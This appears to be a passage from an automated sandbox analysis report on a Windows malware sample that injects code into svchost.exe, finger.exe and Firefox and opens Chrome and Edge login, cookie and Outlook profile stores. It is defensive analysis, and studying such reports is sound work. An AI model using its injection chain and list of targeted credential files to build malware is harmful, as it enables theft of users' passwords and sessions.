Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtQueryValueKey: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Thread APC queued: target process: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F77008 Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_003E1201
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_003C2BA5
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003EB226 SendInput,keybd_event, 0_2_003EB226
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_004022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_004022DA
Source: C:\Users\user\Desktop\BE.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BE.exe" Jump to behavior
Source: C:\Program Files (x86)\GqdTPudCvRtHbxaMYjJNwroHJWRNOAGXqdwapQrLKGZKKOxvRot\mjUxxQvdYhZcUTbGlnDuL.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe" Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_003E0B62
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_003E1663
Source: BE.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000000.2148881440.0000000001B10000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523484329.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4523777673.00000000014C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: BE.exe, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000000.2148881440.0000000001B10000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523484329.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4523777673.00000000014C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000000.2148881440.0000000001B10000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523484329.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4523777673.00000000014C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000000.2148881440.0000000001B10000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523484329.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000002.4523777673.00000000014C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003A0698 cpuid 0_2_003A0698
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_003F8195
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003DD27A GetUserNameW, 0_2_003DD27A
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_003BB952
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003842DE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4526747415.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4522537539.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260683623.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524080493.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260393670.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524196683.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2261145048.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4524061386.0000000004690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: BE.exe Binary or memory string: WIN_81
Source: BE.exe Binary or memory string: WIN_XP
Source: BE.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: BE.exe Binary or memory string: WIN_XPe
Source: BE.exe Binary or memory string: WIN_VISTA
Source: BE.exe Binary or memory string: WIN_7
Source: BE.exe Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4526747415.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4522537539.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260683623.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524080493.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260393670.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524196683.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2261145048.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4524061386.0000000004690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00401204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00401204
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_00401806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00401806
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs